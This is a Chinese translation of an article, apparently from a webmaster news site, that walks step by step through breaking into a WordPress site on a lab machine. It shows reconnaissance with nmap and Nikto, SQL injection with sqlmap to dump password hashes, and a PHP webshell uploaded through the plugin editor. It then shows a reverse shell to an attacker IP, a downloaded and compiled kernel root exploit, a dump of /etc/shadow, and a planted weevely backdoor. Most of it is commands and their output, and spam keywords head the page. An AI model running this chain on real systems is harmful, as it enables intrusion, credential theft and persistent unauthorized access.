婷婷久久综合九色综合,欧美成色婷婷在线观看视频,偷窥视频一区,欧美日本一道道一区二区

<tt id="bu9ss"></tt>
  • <span id="bu9ss"></span>
  • <pre id="bu9ss"><tt id="bu9ss"></tt></pre>
    <label id="bu9ss"></label>

    當前位置:首頁 >  站長 >  搜索優(yōu)化 >  正文

    黑客是怎樣入侵你的網站的

     2015-08-13 20:05  來源: 互聯(lián)網   我來投稿 撤稿糾錯

      阿里云優(yōu)惠券 先領券再下單

    這個問題很難回答,簡單的來說,入侵一個網站可以有很多種方法。本文的目的是展示黑客們常用的掃描和入侵網站的技術。

    假設你的站點是:hack-test.com

    讓我們來ping一下這個服務器:

    我們得到了一個IP地址:173.236.138.113 – 這是我們目標服務器的IP地址。

    Sameip.org 可以幫助我們找到其他與這個服務器綁定的域名:

    Same IP

    26 sites hosted on IP Address 173.236.138.113

    有26個站點在這臺服務器上(173.236.138.113)。許多黑客會選擇攻擊在同服務器上的不同站點從而入侵到你的網站。但是出于為了學習目的,我們只選擇入侵你的服務器。

    我們需要從你的站點得到一下信息:

    1.DNS記錄(A,NS,TXT,MX 和SOA)

    2.網站服務器的類型(Apache,IIS,Tomcat)

    3.域名的注冊信息(哪個公司擁有這個域名)

    4.你的名字,地址,EMAIL和電話

    5.你的網站上所運行的腳本類型(PHP,ASP,ASP.NET,JSP,CFM)

    6.服務器的操作系統(tǒng)類型(Unix,Linux,Windows,Solaris)

    7.服務器對外開放的端口(80,443,21,等)

    現在讓我們來尋找網站的DNS記錄。選擇網站“Who.is”來實現這個目標。

    我們發(fā)現站點上的DNS記錄有:

    讓我們來檢測一下網站服務器的類型:

    我們可以看到,網站服務器用的是Apache. 稍后我們會檢測Apache的版本。

    HACK-TEST.COM SITE INFORMATION

    IP: 173.236.138.113

    Website Status: active

    Server Type: Apache

    Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753

    Page Views per Visit: 1 Month: 2.0 3 Month: 3.7

    接下來我們來尋找一下域名的注冊信息:

    我們得到了注冊者以及其他重要的信息。我們可以用Whatweb來檢測你的站點使用的是什么腳本語言以及操作系統(tǒng)類型和網站服務器的版本。

    我們可以看到,網站使用的是WordPress,操作系統(tǒng)類型是Fedora Linux,網站服務器版本是Apache 2.2.15,下面我們來檢測一下服務器上打開的端口:

    我們使用Nmap:

    1.檢測服務器上運行著哪些服務:

    root@bt:/# nmap -sV hack-test.com

    Starting Nmap 5.59BETA1 ( ) at 2011-12-28 06:39 EET

    Nmap scan report for hack-test.com (192.168.1.2)

    Host is up (0.0013s latency).

    Not shown: 998 filtered ports

    PORT STATE SERVICE VERSION

    22/tcp closed ssh

    80/tcp open http Apache httpd 2.2.15 ((Fedora))

    MAC Address: 00:0C:29:01:8A:4D (VMware)

    Service detection performed. Please report any incorrect results at .

    Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

    2.檢測服務器的OS

    root@bt:/# nmap -O hack-test.com

    Starting Nmap 5.59BETA1 ( ) at 2011-12-28 06:40 EET

    Nmap scan report for hack-test.com (192.168.1.2)

    Host is up (0.00079s latency).

    Not shown: 998 filtered ports

    PORT STATE SERVICE

    22/tcp closed ssh

    80/tcp open http

    MAC Address: 00:0C:29:01:8A:4D (VMware)

    Device type: general purpose

    Running: Linux 2.6.X

    OS details: Linux 2.6.22 (Fedora Core 6)

    Network Distance: 1 hop

    OS detection performed. Please report any incorrect results at .

    Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

    服務器只開放了80端口,操作系統(tǒng)是Linux 2.6.22(Fedora Core 6)

    現在我們已經得到了所有重要的信息,接下來我們來做一下弱點測試,例如:sql注入,盲注,LFI,RFI,XSS,CSRF,等。

    我們用Nikto.pl 來獲取信息以及弱點:

    root@bt:/pentest/web/nikto# perl nikto.pl -h

    - Nikto v2.1.4

    ---------------------------------------------------------------------------

    + Target IP: 192.168.1.2

    + Target Hostname: hack-test.com

    + Target Port: 80

    + Start Time: 2011-12-29 06:50:03

    ---------------------------------------------------------------------------

    + Server: Apache/2.2.15 (Fedora)

    + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b

    + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.

    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE

    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

    + OSVDB-3268: /icons/: Directory indexing found.

    + OSVDB-3233: /icons/README: Apache default file found.

    + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host

    + End Time: 2011-12-29 06:50:37 (34 seconds)

    ---------------------------------------------------------------------------

    + 1 host(s) tested

    也可以使用W3AF,這個工具可以在Backtrack 5 R1中找到

    root@bt:/pentest/web/w3af# ./w3af_gui

    Starting w3af, running on:

    Python version:

    2.6.5 (r265:79063, Apr 16 2010, 13:57:41)

    [GCC 4.4.3]

    GTK version: 2.20.1

    PyGTK version: 2.17.0

    w3af - Web Application Attack and Audit Framework

    Version: 1.2

    Revision: 4605

    Author: Andres Riancho and the w3af team.

    我們可以插入URL,選擇full audit選項:

    稍等片刻,結果就會出現。

    網站存在著sql注入漏洞以及其他的漏洞。

    讓我們來深入一下sql注入:

    這個地址就是注入點,

    我們用sqlmap然后dump所有入侵所需要用到的數據庫信息

    sqlmap –u url

    稍等片刻:

    選擇“n”繼續(xù):

    網站的sql注入類型是error-based Mysql數據庫的版本是5.

    加上參數“-dbs”可以找出所有的數據庫:

    我們發(fā)現了3個數據庫:

    用dump –Dwordpress -tables導出wordpress數據庫表

    我們需要導出“wp_users”表來得到用戶信息以及密碼的hash,之后我們就可以嘗試著去破解密碼最終登陸到wordpress的后臺。

    使用參數 “-T wp_users –columns “

    找到了22列的數據:

    使用參數 -C user_login,user_pass –dump 來導出列。

    之后我們就得到了賬號密碼。

    接來使用這個網站來把MD5轉換成明文密碼(并不是所有HASH都能成功轉換)

    “;

    明文密碼是: q1w2e3

    用戶名 “GeorgeMiller”

    讓我們來登陸wordpress的后臺:

    現在我們來試著上傳一個php webshell 用來在這臺服務器上執(zhí)行一些linux命令

    編輯wordpress的“Textile”插件

    編輯它

    插入一個php webshell來代替一個真正的插件。之后點擊上傳,php webshell就被成功上傳到服務器上了。

    現在,PHP WEBSHELL就成功運行了?,F在就可以瀏覽網站里所有的文件了,但是我們想得到服務器的root權限然后入侵其他的站點。

    選擇 在php webshell 里的“back-connect “然后連接到我們的ip “192.168.1.6″ 端口 “5555″

    在我們點擊連接之前,我們先得在本機上監(jiān)聽一個“5555”的端口

    點擊連接,我們會得到這樣一個窗口:

    我們來試一下linux的命令

    id

    uid=48(apache) gid=489(apache) groups=489(apache)

    pwd

    /var/www/html/Hackademic_RTB1/wp-content/plugins

    uname -a

    Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

    ID命令用來告訴我們用戶ID和用戶組

    Pwd命令能告訴我們現在所在的路徑

    uname –a 命令用來得到一些信息以及內核版本

    好了,我們現在知道服務器的內核版本是2.6.31.5-127.fc12.1686

    Ok, now we knew that server kernel version is 2.6.31.5-127.fc12.1686

    我們可以在 exploit-db.com 找到針對這個版本的exploit

    輸入: “kernel 2.6.31 “

    以上結果沒有合適的,因為他們都不是用來提權的。下一個,就是它了!

    復制這個連接

    在netcat shell里輸入:

    wget -O roro.c

    --2011-12-28 00:48:01--

    Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111

    Connecting to www.exploit-db.com|199.27.135.111|:80... connected.

    HTTP request sent, awaiting response... 301 Moved Permanently

    Location: [following]

    --2011-12-28 00:48:02--

    Connecting to www.exploit-db.com|199.27.135.111|:80... connected.

    HTTP request sent, awaiting response... 200 OK

    Length: 7154 (7.0K) [application/txt]

    Saving to: `roro.c'

    0K ...... 100% 29.7K=0.2s

    我們用wget命令來獲取exploit-db.com的exploit,-O是重命名文件為:roro.c

    Note:

    Linux內核的exploits大多數都是用c語言開發(fā)的所以我們保存后綴名為.c ,直接瀏覽源文件就可以直接看見源碼:

    #include <stdio.h>

    #include <unistd.h>

    #include <stdlib.h>

    #include <fcntl.h>

    #include

    #include

    #include

    #include <errno.h>

    #include <string.h>

    #include

    #include

    #define RECVPORT 5555

    #define SENDPORT 6666

    intprep_sock(intport)

    {

    ints, ret;

    structsockaddr_in addr;

    s = socket(PF_RDS, SOCK_SEQPACKET, 0);

    if(s < 0) {

    printf(“[*] Could not open socket.\n”);

    exit(-1);

    }

    www.2cto.com

    memset(&addr, 0, sizeof(addr));

    All the above lines indicate that this is exploit is written in C language

    After we saved our exploit on server, we will compile it to elf format by typing

    我們保存exploit在服務器上之后,我們可以編譯它:

    gcc roro.c –o roro

    然后執(zhí)行exploit:

    ./roro

    [*] Linux kernel >= 2.6.30 RDS socket exploit

    [*] by Dan Rosenberg

    [*] Resolving kernel addresses...

    [+] Resolved rds_proto_ops to 0xe09f0b20

    [+] Resolved rds_ioctl to 0xe09db06a

    [+] Resolved commit_creds to 0xc044e5f1

    [+] Resolved prepare_kernel_cred to 0xc044e452

    [*] Overwriting function pointer...

    [*] Linux kernel >= 2.6.30 RDS socket exploit

    [*] by Dan Rosenberg

    [*] Resolving kernel addresses...

    [+] Resolved rds_proto_ops to 0xe09f0b20

    [+] Resolved rds_ioctl to 0xe09db06a

    [+] Resolved commit_creds to 0xc044e5f1

    [+] Resolved prepare_kernel_cred to 0xc044e452

    [*] Overwriting function pointer...

    [*] Triggering payload...

    [*] Restoring function pointer...

    Id

    這時候我們已經是root權限了。

    uid=0(root) gid=0(root)

    我們可以瀏覽 /etc/shadow file

    cat /etc/shadow

    root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::

    bin:*:14495:0:99999:7:::

    daemon:*:14495:0:99999:7:::

    adm:*:14495:0:99999:7:::

    lp:*:14495:0:99999:7:::

    sync:*:14495:0:99999:7:::

    shutdown:*:14495:0:99999:7:::

    halt:*:14495:0:99999:7:::

    mail:*:14495:0:99999:7:::

    uucp:*:14495:0:99999:7:::

    operator:*:14495:0:99999:7:::

    games:*:14495:0:99999:7:::

    gopher:*:14495:0:99999:7:::

    ftp:*:14495:0:99999:7:::

    nobody:*:14495:0:99999:7:::

    vcsa:!!:14557::::::

    avahi-autoipd:!!:14557::::::

    ntp:!!:14557::::::

    dbus:!!:14557::::::

    rtkit:!!:14557::::::

    nscd:!!:14557::::::

    tcpdump:!!:14557::::::

    avahi:!!:14557::::::

    haldaemon:!!:14557::::::

    openvpn:!!:14557::::::

    apache:!!:14557::::::

    saslauth:!!:14557::::::

    mailnull:!!:14557::::::

    smmsp:!!:14557::::::

    smolt:!!:14557::::::

    sshd:!!:14557::::::

    pulse:!!:14557::::::

    gdm:!!:14557::::::

    p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::

    mysql:!!:14981::::::

    瀏覽 /etc/passwd file

    cat /etc/passwd

    root:x:0:0:root:/root:/bin/bash

    bin:x:1:1:bin:/bin:/sbin/nologin

    daemon:x:2:2:daemon:/sbin:/sbin/nologin

    adm:x:3:4:adm:/var/adm:/sbin/nologin

    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

    sync:x:5:0:sync:/sbin:/bin/sync

    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

    halt:x:7:0:halt:/sbin:/sbin/halt

    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

    operator:x:11:0:operator:/root:/sbin/nologin

    games:x:12:100:games:/usr/games:/sbin/nologin

    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

    nobody:x:99:99:Nobody:/:/sbin/nologin

    vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin

    avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

    ntp:x:38:38::/etc/ntp:/sbin/nologin

    dbus:x:81:81:System message bus:/:/sbin/nologin

    rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin

    nscd:x:28:493:NSCD Daemon:/:/sbin/nologin

    tcpdump:x:72:72::/:/sbin/nologin

    avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin

    haldaemon:x:68:491:HAL daemon:/:/sbin/nologin

    openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin

    apache:x:48:489:Apache:/var/www:/sbin/nologin

    saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

    mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin

    smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin

    smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin

    sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

    pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin

    gdm:x:42:481::/var/lib/gdm:/sbin/nologin

    p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash

    mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash

    我們可以用“john the ripper”來破解用戶的密碼,但我們不會這么做。

    黑客需要留一個后門在服務器上,方便以后訪問。

    這里,我們使用weevely來生成一個小型有密碼的php后門,然后上傳到服務器上來達到目的。

    weevely 用法 :

    root@bt:/pentest/backdoors/web/weevely# ./main.py -

    Weevely 0.3 - Generate and manage stealth PHP backdoors.

    Copyright (c) 2011-2012 Weevely Developers

    Website:

    Usage: main.py [options]

    Options:

    -h, --help show this help message and exit

    -g, --generate Generate backdoor crypted code, requires -o and -p .

    -o OUTPUT, --output=OUTPUT

    Output filename for generated backdoor .

    -c COMMAND, --command=COMMAND

    Execute a single command and exit, requires -u and -p

    .

    -t, --terminal Start a terminal-like session, requires -u and -p .

    -C CLUSTER, --cluster=CLUSTER

    Start in cluster mode reading items from the give

    file, in the form 'label,url,password' where label is

    optional.

    -p PASSWORD, --password=PASSWORD

    Password of the encrypted backdoor .

    -u URL, --url=URL Remote backdoor URL .

    創(chuàng)建一個帶密碼的php后門

    root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko

    Weevely 0.3 - Generate and manage stealth PHP backdoors.

    Copyright (c) 2011-2012 Weevely Developers

    Website:

    + Backdoor file 'hax.php' created with password 'koko'.

    通過php webshell上傳一個php后門

    上傳完畢之后我們使用一下命令來連接:

    root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u -p koko

    Weevely 0.3 - Generate and manage stealth PHP backdoors.

    Copyright (c) 2011-2012 Weevely Developers

    Website:

    + Using method 'system()'.

    + Retrieving terminal basic environment variables .

    [apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]

    測試我們的 hax.php 后門

    [via infosecinstitute 譯ppsbb]

    SEO專題推薦:

    關鍵詞優(yōu)化專題:網站關鍵詞優(yōu)化沒效果?來這里學習最實用的關鍵詞優(yōu)化技巧!

    內鏈優(yōu)化專題:最能提升網站權重的內鏈部署優(yōu)化技巧與方法

    外鏈建設專題:高質量自然外鏈怎么做?讀完這些你將質的飛躍

    網站降權專題:2015年最有用的網站降權、被K、被黑、被攻擊的解決方法

    用戶體驗專題:學習完這些,作為站長的你可以秒懂如何做網站用戶體驗

    行業(yè)網站專題:優(yōu)化行業(yè)網站的“葵花寶典”看完后無優(yōu)化壓力

    申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點子。點擊此處,共同探討創(chuàng)業(yè)新機遇!

    相關文章

    熱門排行

    信息推薦